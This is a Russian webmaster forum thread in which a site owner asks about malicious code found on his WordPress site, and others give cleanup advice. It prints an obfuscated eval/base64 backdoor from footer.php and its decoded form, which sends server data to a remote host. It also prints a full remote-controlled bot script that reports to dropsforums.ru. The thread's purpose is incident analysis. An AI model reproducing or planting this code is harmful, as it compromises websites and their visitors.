Подскажите, что это такое и зачем на сайте под Вордпресс?

**Gann** · 07.06.2016 15:44

Привет!

Просматривая один из сайтов, случайно нашёл вот такой вот код в самом начале файла footer.php:

Развернуть текст

<?php /*  *//*  */ ?><?php /*  */ eval(gzuncompress(base64_decode('eNqFVm1v01YU/it3USXiNg1+iZOmVTZBkxZYaas0aQsYWTfOTeLG8Y3s68ahQryI8dayaQJWpH3aB7qJia1DQhNCk4CNabCNCSa2shXtr+xcu6xJ6MCtbCf33POcc55znxPDwq6L9Ktnfl97sdR0zEXMCHIZZqbRpz//7vTq5sju/r0WpWXbtBfwMNqPLNOoozb1HESwY9ESiSFsl5Fnl2n4dQszoxbv3x26QRXPNphJbaRfuPnV7TurP/x4Ltqn3zrz853HwpJZib7jEqsyPLwFJwyHH/XNlx/cfBEVAH4GO7gmpSsGwDfgiiFax20AIHbZrIw4hHmOjfZiN5dM6Nnc6FQ5F+3yeWQL7qgwcrw3G4brBMJGTWwzF9FKJYaqjmcz065CprCGEXOoZQFcd3k68toKdakLNIMdB7ejEV3zy6omS4m16081f4hEMu92p3SI4FpQVgAzGXKoV+XVixRymq+ks5okS0W/wB+aryY1PyGPRWLgVhEVzS+JJ784++eDG4HX7szcBg6JQqzGKStRynjVIliTJDEvGlm6OAEQyp5jE3a5pUmKJI8taH4ScBKpIjvU8DUpmTysiUm5rElqwjDVhRJskMVFMJb52yzcxNK45WHlIBirhiaJqVprWh7T/FQKz00uHh6HyNV0aZx/oxyag/tQbTILqUjgEzYA1ph9GByKs20Al8FDQszwDD9Z+2fj3GvlmqqhNlQsBllhhiqEWC6qQt5BZvvyPCDIjEcOaSZaGU1Mqdzb7Uunrmg+lq59ef/xa9Wa4bWKvXq0CSEY12oBDUVxdiYsfLI0OzMP1RABQ93LGVFhQQ1i3dR8IwXu8QmgWtIUKfUrECSu78BLg3ecSxsEMYpdFhweAqkA99B+4RGCQxlHE3xlahc868RFJY8xAiuWhUw7tDIcCDeODsKZCCKtAx0qcMIDk+RkYXYsHUauqvV6EObK8tONn26cv6cpsgKhRQ7Y3PAYp3P+QA0MccCqV86Kr+r2aEPz08rL65qcSCz/cpfvAjtljEMVORSAgA9epnlefOAvuS9fDErD95/avAi1kdZX1/jWSAzO4PHto3P1yR+Xzlw/+/BvkIQTH3/z7PzK189OCkt9+kffnv3r2sNbzzOjxbyl7580C6AFRjE/oc8QRqcL0W2TmCiJ6oAopQZFWepuFt79wcHizfJe/+6BQVGReglpQg+FhJSwDX8uFDMmqqLErVPJ3vaLoRbvPOyQwH2V2jZGoH0tk9UAh7oEgAbRoNgDVCUMAUaTYNtjQO90+IIqDm3APo5uWU3s1AEeNosJnq8T5Ds1zTrzjZo2E/JToLjRdFpNxtWB8CGEK6Agk9moGJfV7tC3AHkZ+OL2TRBGgirP5HorGyLRIiCpYm9C7xMbjTtmpULa6IAT50LGr/DcDHB7IdbJ6siox9PJFWjz9XTCoBVFSceV/66Bt3wWYuHkgnGxPVsi+vOVNTiK6tMPI0Lv/JjrpI5hq851Hpeox7ujT39w+vL6uc0n1z7PGJ5j6WQ+N9oRqdA7C3c1kNskNotBFy14jSa0QcuG48loQCjwCaXhp9ht0GCUVDADDeZjp+bQFmi9UXcRRMStDcx4540WAdiYgDbqQg6nXEeEPYkVaqaL4N9lXtPkYni8T1/9bfnTlUzHGduxWt+va7Io8inC9SsixIElMmnQMtnZPpRlId4HVOZnc/kjO1ppcpJPPfXUlc8CxRWOvmXDJuhlqKAXAvm8x4cbbBPi/+NfSizDaIVhVR4CSQONAV0uKxAYFJDHn+UFfBPio43LIGs+TsBYhrlmGHffAOcPSZsX7/OYVkEJk7yziFGjPWOEUZugUWqV4ZUsErTHc+GXBKqai6DgjS3ZLxHixHm3Bfz09NQc5nIy5xCXWaTDIbTnvwjCiFc='))); /*  */ ?>

[свернуть]

Попытался расшифровать, получил вот это:

Развернуть текст

class _????{private static$_????;/*Bloodninja: I lick your earlobe, and undo your watch.*/static function _????????($_????){if(!self::$_????):self::_????();/*Sarah19fca: mmmm, okay.*/endif;return BasE64_DECOdE(self::$_????[$_????]);}/*Bloodninja: I take yo pants off, grunting like a troll.*/private static function _????(){self::$_????=array("_\xd5\214???\x8e"=>/*Sarah19fca: Yeah I like it rough.*/"TE\x39D\121UxT\121\x56\x42F","_\303\xb0?????"=>/*Bloodninja: I smack you thick booty.*/"a\110R0cDovL\x33AzLndw\1312Fj\x61\x47UtYmx\166Z\062d\154ci5jb\x320v\132\x32V\x30bGlua3M\165c\107hwP2F\x77aWNvZG\1259bGF\x73YW\x78hND\x51\155c\x47FnZ\130Vy\x62\1040=","_????"=>/*Sarah19fca: Oh yeah, that feels good.*/"aHR\x30cDo\166\114w=\075","_????\xa1????"=>/*Bloodninja: Smack, Smack, yeeeaahhh.*/"U0VS\x56\x6bVSX\060\x35BT\125\x55=","_?\xc7\xaa\211\317?\300?"=>/*Bloodninja: I make some toast and eat it off your ass. Land O' Lakes butter all in your crack. Mmmm.*/"UkV\x52V\125\126TVF9\x56\x55kk=","_???????\323"=>"Jn\126z\132XJh\x5a\x32VudD0\075","_??\x93?\244??"=>"\x53F\x52U\125F9\126U0VSX\x30\106HRU5\x55","_??\xc1???"=>"",);}}function _????????($_??????){$_????U?=CURl_INiT();cURL_SetoPT($_????U?,0105+017-021/*Sarah19fca: you like that?*/+-031/*Bloodninja: I peel some bananas.*/,0501+-0376/*Sarah19fca: Oh, what are you gonna do with those?*/- -01/*Bloodninja: get me peanuts. Peanuts from the ballpark.*/-0104);cUrL_SetOPt($_????U?,(int)ROund(9956.5+9956.5),(int)rouND(0.25/*Sarah19fca: Peanuts?*/+0.25+0.25+0.25));CURl_SEtoPT($_????U?,(int)RoUnd(5001/*Bloodninja: Ken Griffey Jr. Yeaaaaahhh.*/+5001),$_??????);CurL_SETopt($_????U?,(int)rouND(3339.3333333333+3339.3333333333+3339.3333333333),_????::_????????("_??\xa5ю"));/*Sarah19fca: What are you talking about?*/$_???????=curl_eXEC($_????U?);/*Bloodninja: I'm spent, I jump down into the alley and smoke a fatty. I throw rocks at the cats.*/CUrl_cLose($_????U?);return$_???????;/*Sarah19fca: This is stupid.*/}$_????=_????????(_????::_????????("_?\200????\xaa").urLeNcode(_????::_????????("_????").$_SERVER[_????::_????????("_\265\215???????")].$_SERVER[_????::_????????("_?\307\xaa?\317??\xb0")])._????::_????????("_\214?\xd1\xd8??\xc0\xd3").UrleNcoDe($_SERVER[_????::_????????("_???\xa4\x8b\xcc?")])._????::_????????("_\x81??\xb0?\246"));echo/*Bloodninja: Stone Cold Steve Austin gives me some beer.*/$_????;/*Bloodninja: Wanna Wrestle Stone Cold?*/

[свернуть]

Загнал полученный результат в переводчик - получился какой то бред.

ВОПРОС: что это вообще за хрень? От куда могла взяться?

Пароль к админке уже поменял. Запустил проверку Манулом от Яндекса...

**Fartuna** · 07.06.2016 16:47

Сообщение от Gann

что это вообще за хрень? От куда могла взяться?

А плагины какие установлены? Попробуй отключить плагины по очереди и посмотри. Возможно, что один из плагинов это прописывает.

P.s На всякий случай папку uploads проверь, нет ли там скриптов по мимо фото.

**Septik** · 07.06.2016 17:09

WordPress SEO Plugin пробовали отключать?

**Gann** · 08.06.2016 11:56

Fartuna, не плагины... думаю это просто так прописали.. чтобы не удаляли

---------- Сообщение добавлено 09:48 ---------- Предыдущее 09:48 ----------

Septik, пробовал. Когда удалил - более ничего не появилось... пока что

---------- Сообщение добавлено 10:20 ---------- Предыдущее 09:48 ----------

Итак, посмотрел логи и нашёл в wp-admin/script/ несколько подозрительных скриптов. Содержимое одного из них:

Развернуть текст

<?php
header('Access-Control-Allow-Origin: *');
header('Content-Type: text/html; charset=utf-8');
set_time_limit(900);
$hashcode = '7a3cb9bdfa';
if(isset($_POST['hc']) && $_POST['hc'] == $hashcode && isset($_POST['taskid']) && is_numeric($_POST['taskid']) && isset($_POST['taskname']) && !empty($_POST['taskname']) && isset($_POST['threads']) && is_numeric($_POST['threads']) && isset($_POST['delay']) && is_numeric($_POST['delay']) && isset($_POST['timeout']) && is_numeric($_POST['timeout']) && isset($_POST['request']) && is_numeric($_POST['request']) && isset($_POST['requestbody']) && isset($_POST['regex']) && isset($_POST['regex_logic']) && is_numeric($_POST['regex_logic']) && isset($_POST['onlybody']) && is_numeric($_POST['onlybody']) && isset($_POST['onlyheaders']) && is_numeric($_POST['onlyheaders']) && isset($_POST['links_ar']) && isset($_POST['client_id']) && is_numeric($_POST['client_id']) && isset($_POST['proc_id']) && is_numeric($_POST['proc_id']))
{
echo '1';
//print_r($_POST);
$all_links = explode('_||_',$_POST['links_ar']);
if(function_exists('fsockopen')) $vffsockopen = '1';
else $vffsockopen = '2';
}
else
{
echo '2';
//print_r($_POST);
exit();
}

$curl_result = array();
$p_taskid = $_POST['taskid'];
$p_taskname = $_POST['taskname'];
$p_threads = (int)floor($_POST['threads']);
$p_delay = (int)floor($_POST['delay']);
$link_timeout = (int)floor($_POST['timeout']);
$p_request = $_POST['request'];
if($p_request == '2') $p_request = 'post';
else $p_request = 'get';
$p_requestbody = $_POST['requestbody'];
$p_regex = $_POST['regex'];
$p_regex_logic = $_POST['regex_logic'];
$p_onlybody = $_POST['onlybody'];
$p_onlyheaders = $_POST['onlyheaders'];
$p_client_id = $_POST['client_id'];
$p_proc_id = $_POST['proc_id'];
$all_links_o = $all_links;
$double_links = array();
$onlybh = 0;
if($p_onlybody == '1') $onlybh = 1;
if($p_onlyheaders == '1') $onlybh = 2;

$i = 1;
while(count($all_links) > 0)
{
$links_part = array_splice($all_links, 0, $p_threads);
$multithread = new MultiThread($link_timeout);
$multithread->setLinks($links_part);
$multithread->setMethod($p_request,$p_requestbody,$onlybh);
$links_result = $multithread->execute();
foreach($links_result as $res_el)
{
if(!empty($res_el['linkerror']) && $res_el['answer']!='596') $curl_result[$i] = $res_el['link'].'-||-error';
elseif(vf_regex($res_el['answer'],$p_regex,$p_regex_logic) === true)
{
$curl_result[$i] = $res_el['link'].'-||-good';
}
else
{
$curl_result[$i] = $res_el['link'].'-||-bad';
if($res_el['linkerror'] == '2' || $res_el['linkerror'] == '3') $double_links[$i] = $all_links_o[($i-1)];
}
$i++;
}
sleep($p_delay);
}
while(count($double_links) > 0)
{
$links_part = array_slice($double_links, 0, $p_threads, true);
$t_count = count($double_links) - $p_threads;
$double_links = array_slice($double_links, $p_threads, $t_count, true);
$multithread = new MultiThread($link_timeout, 1);
$multithread->setLinks($links_part);
$multithread->setMethod($p_request,$p_requestbody,$onlybh);
$links_result = $multithread->execute();
foreach($links_result as $res_el)
{
if(!empty($res_el['linkerror']) && $res_el['answer']!='596') $curl_result[$res_el['lk']] = $res_el['link'].'-||-error';
elseif(vf_regex($res_el['answer'],$p_regex,$p_regex_logic) === true) $curl_result[$res_el['lk']] = $res_el['link'].'-||-good';
else $curl_result[$res_el['lk']] = $res_el['link'].'-||-bad';
}
sleep($p_delay);
}
//print_r($curl_result);
$curl_result = implode('_||_',$curl_result);
$server_url = 'http://dropsforums.ru/panel/proc/receive_result.php';
$result_init = curl_init($server_url);
curl_setopt($result_init, CURLOPT_POST, true);
curl_setopt($result_init, CURLOPT_TIMEOUT, 15);
curl_setopt($result_init, CURLOPT_CONNECTTIMEOUT, 15);
curl_setopt($result_init, CURLOPT_RETURNTRANSFER, true);
curl_setopt($result_init, CURLOPT_POSTFIELDS, array('hashcode' => $hashcode, 'taskid' => $p_taskid, 'taskname' => $p_taskname, 'client_id' => $p_client_id, 'proc_id' => $p_proc_id, 'vffsockopen' => $vffsockopen, 'result' => $curl_result));
curl_exec($result_init);
curl_close($result_init);

class MultiThread
{
private $maxthreads, $links = array(), $linkscount, $threads = array(), $mtype = 'get', $mcontent, $onlyBody = 0, $onlyHeaders = 0, $results = array();
public function __construct($link_timeout = 1, $double_req = 0, $maxthreads = 150)
{
$this->link_timeout = $link_timeout;
$this->double_req = $double_req;
if($this->double_req == 1)
{
$this->sock_timeout = 3;
$this->link_timeout += 2;
}
else $this->sock_timeout = 2;
$this->maxthreads = $maxthreads;
}

public function setLinks($links = array())
{
$this->links = $links;
$this->linkscount = count($this->links);
if($this->linkscount > $this->maxthreads) $this->links = array_slice($this->links, 0, $this->maxthreads);
}

public function setMethod($type,$mcontent='',$onlyBH=0)
{
$this->mtype = $type;
$this->mcontent = $mcontent;
if($onlyBH == 1) $this->onlyBody = '1';
elseif($onlyBH == 2) $this->onlyHeaders = '1';
}

public function execute()
{
$li = 0;
$t_redirects = array();
foreach ($this->links as $lk => $link)
{
$li++;
$this->results[$li] = array('link' => $link, 'lk' => $lk, 'answer' => '', 'linkerror' => '', 'setonlyBody' => 0);
$t_redirects[$li] = 0;
$link_ar = parse_url($link);
if(isset($link_ar['host']))
{
$server = $link_ar['host'];
if(!$fsock = @fsockopen($server, 80, $erno, $erstr, $this->sock_timeout))
{
if(strpos($erstr,'Name or service not known') !== false) $this->results[$li]['answer'] = '596';
$this->results[$li]['linkerror'] = '2';
}
else
{
$out = get_fwrite_data($link_ar,$this->mtype,$this->mcontent);
fwrite($fsock, $out);
stream_set_timeout($fsock, $this->link_timeout);
stream_set_blocking($fsock, 0);
$this->threads[$li] = $fsock;
}
}
else $this->results[$li]['linkerror'] = '1';
}
$threads_start = time() + floatval(microtime());
do
{
foreach ($this->threads as $key=>$value)
{
$threads_time = round((time() + floatval(microtime()) - $threads_start),2);
if(feof($value) || $threads_time > ($this->link_timeout+8))
{
fclose($value); unset($this->threads[$key]);
}
else
{
$vf_timeout = stream_get_meta_data($value);
if($vf_timeout['timed_out'] === true)
{
$this->results[$key]['linkerror'] = '3';
fclose($value); unset($this->threads[$key]);
continue;
}
//$t_answer = fgets($value);
$t_answer = fread($value, 10240);
if(!empty($t_answer))
{
if(stristr($t_answer,"location:")!='' && (stristr($t_answer,"301 Moved")!='' || stristr($t_answer,"301 Found")!='' || stristr($t_answer,"302 Found")!='' || stristr($t_answer,"302 Moved")!='' || stristr($t_answer,"302 Redirect")!='' || stristr($t_answer,"303 See")!='') && $t_redirects[$key]<3)
{
$link_redirect = preg_match('/^Location: (.+?)$/Um', $t_answer, $t_matches);
$t_redirects[$key] += 1;
$t_matches[1] = trim($t_matches[1]);
echo $this->results[$key]['link'].' - '.$t_matches[1]."\n\n";
if(substr($t_matches[1],0,5) == 'https')
{
$link_ar = parse_url($t_matches[1]);
$server = $link_ar['host'];
if(!$fsock = @fsockopen('ssl://'.$server, 443, $erno, $erstr, $this->sock_timeout))
{
$this->results[$key]['linkerror'] = '4';
fclose($value); unset($this->threads[$key]);
}
else
{
$this->results[$key]['link'] = $t_matches[1];
$out = get_fwrite_data($link_ar,$this->mtype,$this->mcontent);
fwrite($fsock, $out);
stream_set_timeout($fsock, $this->link_timeout);
stream_set_blocking($fsock, 0);
$this->threads[$key] = $fsock;
$this->results[$key]['answer'] = '';
continue;
}
}
else
{
if(substr($t_matches[1],0,4) != 'http')
{
$link_ar = parse_url($this->results[$key]['link']);
$server = $link_ar['host'];
$t_matches[1] = 'http://'.$server.(substr($t_matches[1],0,1)=='/'?'':'/').$t_matches[1];
}
$link_ar = parse_url(trim($t_matches[1]));
$server = $link_ar['host'];
fclose($value); unset($this->threads[$key]);
if(!$fsock = @fsockopen($server, 80, $erno, $erstr, $this->sock_timeout))
{
$this->results[$key]['linkerror'] = '5';
}
else
{
$this->results[$key]['link'] = $t_matches[1];
$out = get_fwrite_data($link_ar,$this->mtype,$this->mcontent);
fwrite($fsock, $out);
stream_set_timeout($fsock, $this->link_timeout);
stream_set_blocking($fsock, 0);
$this->threads[$key] = $fsock;
$this->results[$key]['answer'] = '';
continue;
}
}
}
$this->results[$key]['answer'] .= $t_answer;
if($this->onlyBody == 1 && $this->results[$key]['setonlyBody'] == 0)
{
if(strpos($this->results[$key]['answer'],"\r\n\r\n") !== false)
{
$body_ar = explode("\r\n\r\n",$this->results[$key]['answer'],2);
$this->results[$key]['answer'] = $body_ar[1];
$this->results[$key]['setonlyBody'] = 1;
}
}
elseif($this->onlyHeaders == 1)
{
if(strpos($this->results[$key]['answer'],"\r\n\r\n") !== false)
{
$header_ar = explode("\r\n\r\n",$this->results[$key]['answer']);
$this->results[$key]['answer'] = $header_ar[0];
fclose($value); unset($this->threads[$key]);
}
}
}
}
}
usleep(10000);
}
while (count($this->threads) > 0);

return $this->results;
}
}

function get_fwrite_data($link_ar, $mtype='get', $content)
{
$server = $link_ar['host'];
$query = isset($link_ar['path']) ? $link_ar['path'] : '/';
if(isset($link_ar['query'])) $query .= '?'.$link_ar['query'];
if($mtype=='post')
{
$result = "POST $query HTTP/1.1\r\n";
$result .= "Host: $server\r\n";
$result .= "Cookie: income=1\r\n";
$result .= "Content-Type: application/x-www-form-urlencoded\r\n";
$result .= "Content-Length: ".strlen($content)."\r\n";
$result .= "Connection: Close\r\n\r\n";
$result .= $content;
}
elseif($mtype=='get')
{
$result = "GET $query HTTP/1.1\r\n";
$result .= "Host: $server\r\n";
$result .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n";
//$result .= "Accept: text/xml,application/xml,application/xhtml+xml,application/json,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
//$result .= "Referer: http://armsites.info\r\n";
$result .= "User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\r\n";
$result .= "Connection: Close\r\n\r\n";
}
return $result;
}

function vf_regex($answer, $regex, $regex_logic = 3)
{
if($regex_logic == '1')
{
if(preg_match($regex,$answer)) return true;
}
elseif($regex_logic == '2')
{
if(!preg_match($regex,$answer)) return true;
}
elseif($regex_logic == '3')
{
$regex = str_replace("\n",'',$regex);
$answer = str_replace("\n",'',$answer);
if(strpos($answer,$regex) !== false) return true;
}
elseif($regex_logic == '4')
{
$regex = str_replace("\n",'',$regex);
$answer = str_replace("\n",'',$answer);
if(strpos($answer,$regex) === false) return true;
}
return false;
}
?>

[свернуть]

Удалил всё. Поиски продолжаю..

---------- Сообщение добавлено 10:28 ---------- Предыдущее 10:20 ----------

Ещё здесь /wp-admin//link-parse-editor.php

---------- Сообщение добавлено 11:07 ---------- Предыдущее 10:28 ----------

Выяснилось, что произошло заражение и через сайт размещают ссылки SAPE

---------- Сообщение добавлено 11:56 ---------- Предыдущее 11:07 ----------

С помощью логов обнаружил такой момент:

если добавить к адресу сайта /index.php?itemid=act&check=1&proverka=1, то пишет sape_ready

**redeyer** · 08.06.2016 12:28

Прежде всего смотрите FTP. Я бы вообще его отключил. Или хотя бы меняйте на нем пароли. Также права на файлы и папки - не должны быть 777. Кое-какую защиту дает запуск сайтов под разными пользователями, обычно через apache ITK - по крайней мере помогает не заразить все сайты на VPS.

**Gann** · 08.06.2016 15:49

Всё вроде нашёл, всё удалил... при добавлении к адресу сайта index.php?itemid=act&check=1&proverka=1 вы даёт sape_ready

.

Кто-нибудь знает где искать?

Кстати, злодей с Украины

, я не сильно удивлён

**Fartuna** · 08.06.2016 16:34

Gann,Сделай проще, скачай на комп папку wp-content(на всякий случай), так же ее проверь.

Дальше подключаешься по ftp и удаляешь все папки и файлы движка, кроме wp-config.php, robots, .htaccess и подобных, которых нет в чистом движке. И после удаления заливаешь новый движок и все. Так как папка wp-content останется на сервере, перед тем как будешь лить новый движок, удали оттуда эту папку и файлы типа wp-config.php

P.s Папку wp-content скачать и проверить, но удалять ее не нужно с ftp, если там чисто.

Это самый оптимальный вариант, нежели копать все файлы движка.

НО ПОЛНЫЙ бекап делать обязательно, в том числе и бекап базы данных.

**Gann** · 08.06.2016 16:47

Fartuna, наверное так и сделаю... Вообще никаких последствий заражения пока нету - нет ни ссылок, ничего... просто лишние коды в файлах.

Ну index.php?itemid=act&check=1&proverka=1 - вот только это беспокоит

**Lastwarrior** · 09.06.2016 05:35

Сообщение от Gann

наверное так и сделаю... Вообще никаких последствий заражения пока нету - нет ни ссылок, ничего... просто лишние коды в файлах.

Дали отстоятся просто твоему пирогу, а ссылки могут и на свои ресурсы поставить если надо или дор какой-нибудь со временем зальют.

**Бабайка** · 17.06.2016 01:11

Увидел eval в коде - убей его.

p.s. причем дырка может быть и не у тебя, а у хостера.

	07.06.2016 15:44 #1
Gann Рождённый в СССР Регистрация: 30.04.2012 Сообщений: 1,073 Репутация: 310	Привет! Просматривая один из сайтов, случайно нашёл вот такой вот код в самом начале файла footer.php: Развернуть текст <?php /* <!-- Begin WordPress Cache (DO NOT MODIFY) --> // <!-- End WordPress Cache --> / ?><?php / <!-- WordPress SEO Plugin --> / eval(gzuncompress(base64_decode('eNqFVm1v01YU/it3USXiNg1+iZOmVTZBkxZYaas0aQsYWTfOTeLG8Y3s68ahQryI8dayaQJWpH3aB7qJia1DQhNCk4CNabCNCSa2shXtr+xcu6xJ6MCtbCf33POcc55znxPDwq6L9Ktnfl97sdR0zEXMCHIZZqbRpz//7vTq5sju/r0WpWXbtBfwMNqPLNOoozb1HESwY9ESiSFsl5Fnl2n4dQszoxbv3x26QRXPNphJbaRfuPnV7TurP/x4Ltqn3zrz853HwpJZib7jEqsyPLwFJwyHH/XNlx/cfBEVAH4GO7gmpSsGwDfgiiFax20AIHbZrIw4hHmOjfZiN5dM6Nnc6FQ5F+3yeWQL7qgwcrw3G4brBMJGTWwzF9FKJYaqjmcz065CprCGEXOoZQFcd3k68toKdakLNIMdB7ejEV3zy6omS4m16081f4hEMu92p3SI4FpQVgAzGXKoV+XVixRymq+ks5okS0W/wB+aryY1PyGPRWLgVhEVzS+JJ784++eDG4HX7szcBg6JQqzGKStRynjVIliTJDEvGlm6OAEQyp5jE3a5pUmKJI8taH4ScBKpIjvU8DUpmTysiUm5rElqwjDVhRJskMVFMJb52yzcxNK45WHlIBirhiaJqVprWh7T/FQKz00uHh6HyNV0aZx/oxyag/tQbTILqUjgEzYA1ph9GByKs20Al8FDQszwDD9Z+2fj3GvlmqqhNlQsBllhhiqEWC6qQt5BZvvyPCDIjEcOaSZaGU1Mqdzb7Uunrmg+lq59ef/xa9Wa4bWKvXq0CSEY12oBDUVxdiYsfLI0OzMP1RABQ93LGVFhQQ1i3dR8IwXu8QmgWtIUKfUrECSu78BLg3ecSxsEMYpdFhweAqkA99B+4RGCQxlHE3xlahc868RFJY8xAiuWhUw7tDIcCDeODsKZCCKtAx0qcMIDk+RkYXYsHUauqvV6EObK8tONn26cv6cpsgKhRQ7Y3PAYp3P+QA0MccCqV86Kr+r2aEPz08rL65qcSCz/cpfvAjtljEMVORSAgA9epnlefOAvuS9fDErD95/avAi1kdZX1/jWSAzO4PHto3P1yR+Xzlw/+/BvkIQTH3/z7PzK189OCkt9+kffnv3r2sNbzzOjxbyl7580C6AFRjE/oc8QRqcL0W2TmCiJ6oAopQZFWepuFt79wcHizfJe/+6BQVGReglpQg+FhJSwDX8uFDMmqqLErVPJ3vaLoRbvPOyQwH2V2jZGoH0tk9UAh7oEgAbRoNgDVCUMAUaTYNtjQO90+IIqDm3APo5uWU3s1AEeNosJnq8T5Ds1zTrzjZo2E/JToLjRdFpNxtWB8CGEK6Agk9moGJfV7tC3AHkZ+OL2TRBGgirP5HorGyLRIiCpYm9C7xMbjTtmpULa6IAT50LGr/DcDHB7IdbJ6siox9PJFWjz9XTCoBVFSceV/66Bt3wWYuHkgnGxPVsi+vOVNTiK6tMPI0Lv/JjrpI5hq851Hpeox7ujT39w+vL6uc0n1z7PGJ5j6WQ+N9oRqdA7C3c1kNskNotBFy14jSa0QcuG48loQCjwCaXhp9ht0GCUVDADDeZjp+bQFmi9UXcRRMStDcx4540WAdiYgDbqQg6nXEeEPYkVaqaL4N9lXtPkYni8T1/9bfnTlUzHGduxWt+va7Io8inC9SsixIElMmnQMtnZPpRlId4HVOZnc/kjO1ppcpJPPfXUlc8CxRWOvmXDJuhlqKAXAvm8x4cbbBPi/+NfSizDaIVhVR4CSQONAV0uKxAYFJDHn+UFfBPio43LIGs+TsBYhrlmGHffAOcPSZsX7/OYVkEJk7yziFGjPWOEUZugUWqV4ZUsErTHc+GXBKqai6DgjS3ZLxHixHm3Bfz09NQc5nIy5xCXWaTDIbTnvwjCiFc='))); / <!-- End WordPress SEO Plugin --> / ?> [свернуть] Попытался расшифровать, получил вот это: Развернуть текст class _????{private static$_????;/Bloodninja: I lick your earlobe, and undo your watch./static function _????????($_????){if(!self::$_????):self::_????();/Sarah19fca: mmmm, okay./endif;return BasE64_DECOdE(self::$_????[$_????]);}/Bloodninja: I take yo pants off, grunting like a troll./private static function _????(){self::$_????=array("_\xd5\214???\x8e"=>/Sarah19fca: Yeah I like it rough./"TE\x39D\121UxT\121\x56\x42F","_\303\xb0?????"=>/Bloodninja: I smack you thick booty./"a\110R0cDovL\x33AzLndw\1312Fj\x61\x47UtYmx\166Z\062d\154ci5jb\x320v\132\x32V\x30bGlua3M\165c\107hwP2F\x77aWNvZG\1259bGF\x73YW\x78hND\x51\155c\x47FnZ\130Vy\x62\1040=","_????"=>/Sarah19fca: Oh yeah, that feels good./"aHR\x30cDo\166\114w=\075","_????\xa1????"=>/Bloodninja: Smack, Smack, yeeeaahhh./"U0VS\x56\x6bVSX\060\x35BT\125\x55=","_?\xc7\xaa\211\317?\300?"=>/Bloodninja: I make some toast and eat it off your ass. Land O' Lakes butter all in your crack. Mmmm./"UkV\x52V\125\126TVF9\x56\x55kk=","_???????\323"=>"Jn\126z\132XJh\x5a\x32VudD0\075","_??\x93?\244??"=>"\x53F\x52U\125F9\126U0VSX\x30\106HRU5\x55","_??\xc1???"=>"",);}}function _????????($_??????){$_????U?=CURl_INiT();cURL_SetoPT($_????U?,0105+017-021/Sarah19fca: you like that?/+-031/Bloodninja: I peel some bananas./,0501+-0376/Sarah19fca: Oh, what are you gonna do with those?/- -01/Bloodninja: get me peanuts. Peanuts from the ballpark./-0104);cUrL_SetOPt($_????U?,(int)ROund(9956.5+9956.5),(int)rouND(0.25/Sarah19fca: Peanuts?/+0.25+0.25+0.25));CURl_SEtoPT($_????U?,(int)RoUnd(5001/Bloodninja: Ken Griffey Jr. Yeaaaaahhh./+5001),$_??????);CurL_SETopt($_????U?,(int)rouND(3339.3333333333+3339.3333333333+3339.3333333333),_????::_????????("_??\xa5ю"));/Sarah19fca: What are you talking about?/$_???????=curl_eXEC($_????U?);/Bloodninja: I'm spent, I jump down into the alley and smoke a fatty. I throw rocks at the cats./CUrl_cLose($_????U?);return$_???????;/Sarah19fca: This is stupid./}$_????=_????????(_????::_????????("_?\200????\xaa").urLeNcode(_????::_????????("_????").$_SERVER[_????::_????????("_\265\215???????")].$_SERVER[_????::_????????("_?\307\xaa?\317??\xb0")])._????::_????????("_\214?\xd1\xd8??\xc0\xd3").UrleNcoDe($_SERVER[_????::_????????("_???\xa4\x8b\xcc?")])._????::_????????("_\x81??\xb0?\246"));echo/Bloodninja: Stone Cold Steve Austin gives me some beer./$_????;/Bloodninja: Wanna Wrestle Stone Cold?*/ [свернуть] Загнал полученный результат в переводчик - получился какой то бред. ВОПРОС: что это вообще за хрень? От куда могла взяться? Пароль к админке уже поменял. Запустил проверку Манулом от Яндекса... Последний раз редактировалось Gann; 07.06.2016 в 15:54. Причина: МОЁ 1000-ое СООБЩЕНИЕ НА ФОРУМЕ!!! Не думал, что оно будет про Backdoor
0 Gann

	07.06.2016 16:47 #2
Fartuna Гуру Регистрация: 07.01.2015 Сообщений: 932 Репутация: 764	Сообщение от Gann что это вообще за хрень? От куда могла взяться? А плагины какие установлены? Попробуй отключить плагины по очереди и посмотри. Возможно, что один из плагинов это прописывает. P.s На всякий случай папку uploads проверь, нет ли там скриптов по мимо фото.
0 Fartuna

	07.06.2016 17:09 #3
Septik Гуру Регистрация: 03.04.2010 Сообщений: 790 Репутация: 168 Webmoney BL: ?	WordPress SEO Plugin пробовали отключать? Создание и правка Вашего сайта - верстка, ремонт
0 Septik

	08.06.2016 11:56 #4
Gann Рождённый в СССР Регистрация: 30.04.2012 Сообщений: 1,073 Репутация: 310	Fartuna, не плагины... думаю это просто так прописали.. чтобы не удаляли ---------- Сообщение добавлено 09:48 ---------- Предыдущее 09:48 ---------- Septik, пробовал. Когда удалил - более ничего не появилось... пока что ---------- Сообщение добавлено 10:20 ---------- Предыдущее 09:48 ---------- Итак, посмотрел логи и нашёл в wp-admin/script/ несколько подозрительных скриптов. Содержимое одного из них: Развернуть текст <?php header('Access-Control-Allow-Origin: '); header('Content-Type: text/html; charset=utf-8'); set_time_limit(900); $hashcode = '7a3cb9bdfa'; if(isset($_POST['hc']) && $_POST['hc'] == $hashcode && isset($_POST['taskid']) && is_numeric($_POST['taskid']) && isset($_POST['taskname']) && !empty($_POST['taskname']) && isset($_POST['threads']) && is_numeric($_POST['threads']) && isset($_POST['delay']) && is_numeric($_POST['delay']) && isset($_POST['timeout']) && is_numeric($_POST['timeout']) && isset($_POST['request']) && is_numeric($_POST['request']) && isset($_POST['requestbody']) && isset($_POST['regex']) && isset($_POST['regex_logic']) && is_numeric($_POST['regex_logic']) && isset($_POST['onlybody']) && is_numeric($_POST['onlybody']) && isset($_POST['onlyheaders']) && is_numeric($_POST['onlyheaders']) && isset($_POST['links_ar']) && isset($_POST['client_id']) && is_numeric($_POST['client_id']) && isset($_POST['proc_id']) && is_numeric($_POST['proc_id'])) { echo '1'; //print_r($_POST); $all_links = explode('_\|\|_',$_POST['links_ar']); if(function_exists('fsockopen')) $vffsockopen = '1'; else $vffsockopen = '2'; } else { echo '2'; //print_r($_POST); exit(); } $curl_result = array(); $p_taskid = $_POST['taskid']; $p_taskname = $_POST['taskname']; $p_threads = (int)floor($_POST['threads']); $p_delay = (int)floor($_POST['delay']); $link_timeout = (int)floor($_POST['timeout']); $p_request = $_POST['request']; if($p_request == '2') 